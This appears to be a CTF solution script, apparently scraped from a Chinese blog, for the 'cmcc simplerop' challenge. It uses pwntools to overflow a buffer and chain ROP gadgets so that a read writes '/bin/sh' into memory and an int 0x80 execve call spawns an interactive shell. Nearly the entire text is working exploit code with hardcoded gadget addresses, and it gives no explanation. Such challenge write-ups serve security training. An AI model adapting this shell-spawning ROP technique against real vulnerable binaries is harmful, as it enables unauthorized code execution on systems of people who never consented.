from pwn import *
p = process('./simplerop')
p.recv()
int80_addr = 0x080493e1
pop_eax = 0x080bae06
read = 0x0806CD50
binsh = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850
payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh) + p32(int80_addr)
p.sendline(payload)
p.send('/bin/sh\x00')
p.interactive()
cmcc simplerop
最新推荐文章于 2022-03-17 22:48:05 发布